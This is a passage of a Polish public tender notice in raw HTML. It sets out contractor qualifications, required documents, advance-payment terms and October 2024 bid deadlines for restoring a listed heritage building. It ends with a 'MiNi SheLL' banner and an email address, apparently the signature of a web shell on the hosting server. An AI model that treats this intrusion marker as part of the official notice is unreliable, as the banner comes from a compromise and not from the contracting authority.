KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>4)	zdolności technicznej lub zawodowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>a)	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 robotę budowlaną obejmującą renowację zabytku nieruchomego polegającą na wykonaniu robót budowlanych i konserwatorskich o wartości minimum 200.000,00 PLN brutto.<br/>UWAGA: przez zabytek nieruchomy rozumie się nieruchomość, jej część lub zespół nieruchomości, będące dziełem człowieka lub związane z jego działalnością i stanowiące świadectwo minionej epoki bądź zdarzenia, których zachowanie leży w interesie społecznym ze względu na posiadaną wartość historyczną, artystyczną lub naukową (art. 3 pkt 2 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2024 r. poz. 1292). <br/>Zamawiający zastrzega, iż przez jedno zamówienie rozumie jedną wykonaną robotę budowlaną w ramach jednej umowy/kontraktu/zlecenia.<br/>Zamawiający wymaga, aby warunek był spełniony w całości przez co najmniej jeden podmiot (jeden lub każdy z podmiotów musi posiadać wymagane doświadczenie). Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz robót (Załącznik nr 6a do SWZ) dotyczy robót budowlanych, w których wykonaniu wykonawca bezpośrednio uczestniczył.<br/>b)	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyły w wykonywaniu zamówienia, tj.:<br/>	minimum 1 osobą zdolną do pełnienia funkcji Kierownika budowy, posiadającą wymagane uprawnienia budowlane do kierowania robotami budowlanymi w specjalności w specjalności konstrukcyjno-budowlanej bez ograniczeń. W/w osoba musi wykazać się co najmniej 18 miesięcznym doświadczeniem udziału w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury (art. 37c ustawy o ochronie zabytków i opiece nad zabytkami).<br/>UWAGA: Przy ustalaniu udziału w pracach konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich, robotach budowlanych lub badaniach architektonicznych, prowadzonych przy zabytkach wpisanych do rejestru albo na Listę Skarbów Dziedzictwa, uwzględnia się udział w tych pracach, badaniach lub robotach, prowadzonych przy zabytkach niewpisanych do rejestru, o ile były one prowadzone przed dniem 26 sierpnia 2011r. (art. 37f ustawy o ochronie zabytków i opiece nad zabytkami).<br/>Udział w pracach konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich, prowadzonych przy zabytkach wpisanych na Listę Skarbów Dziedzictwa, albo w pracach konserwatorskich, pracach restauratorskich, badaniach konserwatorskich, robotach budowlanych lub badaniach architektonicznych, prowadzonych przy zabytkach wpisanych do rejestru, inwentarza muzeum będącego instytucją kultury lub innych zabytkach zaliczanych do jednej z kategorii, o których mowa w art. 14a ust. 2, oraz badaniach archeologicznych lub zatrudnienie przy tych pracach lub badaniach w muzeum będącym instytucją kultury potwierdzają świadectwa, w tym dotyczące odbytych praktyk zawodowych, oraz inne dokumenty zaświadczające udział w tych pracach, badaniach lub robotach lub zatrudnienie przy tych pracach wydane przez kierownika jednostki organizacyjnej, na rzecz której te prace, badania lub roboty były wykonywane, albo przez osobę, pod której nadzorem były wykonywane, w tym zakresy obowiązków na stanowiskach pracy w muzeum będącym instytucją kultury lub zaświadczenia wydane przez wojewódzkich konserwatorów zabytków (art. 37 g ust. 1 ustawy o ochronie zabytków i opiece nad zabytkami).<br/>Udział w pracach konserwatorskich, pracach restauratorskich, badaniach konserwatorskich, robotach budowlanych lub badaniach architektonicznych prowadzonych przed dniem 26 sierpnia 2011 r. przy zabytku niewpisanym do rejestru zabytków potwierdzają świadectwa, inne dokumenty lub zaświadczenia, o których mowa w ust. 1. (art. 37 g ust. 2 ustawy o ochronie zabytków i opiece nad zabytkami) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>a)	informacja z Krajowego Rejestru Karnego w zakresie: <br/>- art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 roku - Prawo zamówień publicznych, zwanej dalej ustawą Pzp,<br/>- oświadczenia zgodnie z art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>b)	oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz. U. z 2024r. poz. 594) z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 9 do SWZ;<br/>c)	zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie z sprawie spłat tych należności;<br/>d)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>e)	odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jego złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp skorzysta z dokumentów znajdujących się w ogólnodostępnych i bezpłatnych bazach danych pod warunkiem wskazania przez Wykonawcę w oświadczeniu, o którym mowa w Rozdziale VII ust. 1 SWZ (Załącznik nr 2 do SWZ), danych umożliwiających dostęp do tych dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty; (Załącznik nr 6a do SWZ).<br/>2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zadania publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 6b do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Zamawiający wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych, jeżeli Wykonawca przewiduje<br/>zastosowanie rozwiązań równoważnych (w przypadku, o którym mowa w Rozdziale III pkt 10 - 14 SWZ) tj. dokumentów na<br/>potwierdzenie równoważności zastosowanych rozwiązań (jeżeli są konieczne do wykazania równoważności). W<br/>szczególności w celu potwierdzenia zgodności oferowanych robót budowlanych, dostaw lub usług z wymaganiami, cechami<br/>lub kryteriami określonymi w opisie przedmiotu zamówienia lub kryteriami oceny ofert, lub wymaganiami związanymi z<br/>realizacją zamówienia Zamawiający może żądać od Wykonawców złożenia certyfikatu wydanego przez jednostkę<br/>oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę. Przez jednostkę oceniającą<br/>zgodność rozumie się jednostkę wykonującą działania z zakresu oceny zgodności, w tym kalibrację, testy, certyfikację i<br/>kontrolę, akredytowaną zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (WE) nr 765/2008 z dnia 9 lipca 2008<br/>r. ustanawiającym wymagania w zakresie akredytacji i nadzoru rynku odnoszące się do warunków wprowadzania produktów<br/>do obrotu i uchylającym rozporządzenie (EWG) nr 339/93 (Dz. Urz. UE L 218 z 13.08.2008, str. 30). Jeżeli wymagane jest<br/>złożenie certyfikatów wydanych przez określoną jednostkę oceniającą zgodność, Zamawiający akceptuje również certyfikaty<br/>wydane przez inne równoważne jednostki oceniające zgodność. Zamawiający akceptuje odpowiednie przedmiotowe środki<br/>dowodowe, inne niż te, o których mowa wyżej, w szczególności dokumentację techniczną producenta, w przypadku gdy<br/>dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, o których mowa w wyżej, ani możliwości ich<br/>uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy, oraz pod<br/>warunkiem, że dany Wykonawca udowodni, że wykonywane przez niego roboty budowlane, dostawy lub usługi spełniają<br/>wymagania, cechy lub kryteria określone w opisie przedmiotu zamówienia lub kryteriów oceny ofert, lub wymagania związane z realizacją zamówienia.<br/>2) Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są<br/>niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3) Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. W<br/>przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Wykonawcy ci składają wspólnie ww.<br/>dokumenty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> certyfikaty, sprawozdania z badań, dokumentacja techniczna producenta <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz oferty – Załącznik nr 1 do SWZ;<br/>2) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu<br/>(oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp) – Załącznik nr 2 do SWZ;<br/>3) Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału<br/>(oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp) – Załącznik nr 3 do SWZ, (w sytuacji, kiedy Wykonawca w celu<br/>wykazania spełnienia warunków udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby);<br/>4) Zobowiązanie podmiotu udostępniającego zasoby (w sytuacji, kiedy Wykonawca w celu wykazania spełnienia warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby) - Załącznik nr 4 do SWZ,<br/>5) Oświadczenie dotyczące rodzajów robót/usług wykonywanych przez poszczególne podmioty występujące wspólnie (w<br/>przypadku oferty składanej wspólnie przez Wykonawców) – Załącznik nr 5 do SWZ,<br/>6) Pełnomocnictwo upoważaniające do złożenia oferty, o ile ofertę składa pełnomocnik lub pełnomocnictwo dla<br/>pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>7) W przypadku zaoferowania zastosowania rozwiązań równoważnych: opis rozwiązań równoważnych potwierdzający<br/>równoważność oferowanych przez Wykonawcę rozwiązań w stosunku do rozwiązań opisanych w dokumentacji technicznej.<br/>8) Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji<br/>zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji (jeżeli Wykonawca zastrzega takie informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują roboty budowlane, do realizacji, których te zdolności są wymagane.<br/>4)	W przypadku, o którym mowa w pkt 3), Wykonawcy wspólnie ubiegający <br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, <br/>które roboty budowlane wykonają poszczególni Wykonawcy – art. 117 ust. 4 ustawy Pzp (Załącznik nr 5 do SWZ).<br/>5)	Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.<br/>6)	W odniesieniu do warunków określonych w ust. 2 pkt 4 lit. a) i b) niniejszego rozdziału SWZ, wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę w postępowaniu [warunek będzie uznany za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie go spełniał samodzielnie]. Na ich potwierdzenie należy złożyć dokumenty określone w ust. 6 pkt 1 lit. a) rozdziału VII SWZ.<br/>7)	Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia i/lub dokumenty wymienione <br/>w Rozdziale VII SWZ składa każdy z Wykonawców występujących wspólnie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>8)	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1.	Wynagrodzenie Wykonawcy, o którym mowa w §3 ust. 2, zostanie wypłacone zgodnie z warunkami wypłat dofinansowania z Rządowego Funduszu Polski Ład: Program Odbudowy Zabytków, tj. Wykonawcy zostanie udzielona zaliczka w wysokości 2% wynagrodzenia należnego Wykonawcy w terminie do 30 dni od dnia podpisania umowy.<br/>2.	Pozostała cześć wynagrodzenia zostanie wypłacona po zakończeniu realizacji zamówienia. <br/>3.	Ponadto Wykonawca jest zobowiązany zapewnić finansowanie inwestycji w części nie pokrytej udziałem własnym Zamawiającego na czas poprzedzający wypłatę środków z Rządowego Funduszu Polski Ład: Program Odbudowy Zabytków, przy czym zapłata wynagrodzenia Wykonawcy w całości nastąpi po odbiorze końcowym inwestycji przez Zamawiającego.<br/>4.	Zamawiający żąda od Wykonawcy wniesienia zabezpieczenia zaliczki w jednej lub kilku formach przewidzianych w art. 442 ust. 3 ustawy Prawo zamówień publicznych. W związku powyższym, po podpisaniu umowy, ale przed udzieleniem zaliczki przez Zamawiającego, Wykonawca złoży zabezpieczenie w wysokości równej udzielonej zaliczki tj. kwotę ……………………… złotych.<br/>5.	Treść zabezpieczenia zaliczki musi zostać zaakceptowana przez Zamawiającego przed udzieleniem zaliczki.<br/>6.	Zabezpieczenie udzielonej zaliczki Zamawiający zwolni w terminie 30 dni od daty dokonania odbioru końcowego robót objętych niniejszą umową.<br/>7.	W trakcie realizacji umowy Wykonawca może dokonać, z zachowaniem ciągłości zabezpieczenia, zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w art. 442 ust. 3 ustawy Prawo zamówień publicznych.<br/>8.	Po otrzymaniu zaliczki Wykonawca jest zobowiązany wystawić i przekazać Zamawiającemu fakturę zaliczkową.<br/>Zapisy dot. zaliczki zawarte we wzorze umowy stanowiącym załącznik nr 7 do SWZ <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy na zgodnie z treścią art. 454 i 455 ustawy Pzp oraz w przypadku, gdy zachodzi<br/>jedna z okoliczności zawartych w paragrafie 13 wzoru Umowy stanowiącego załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-25 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com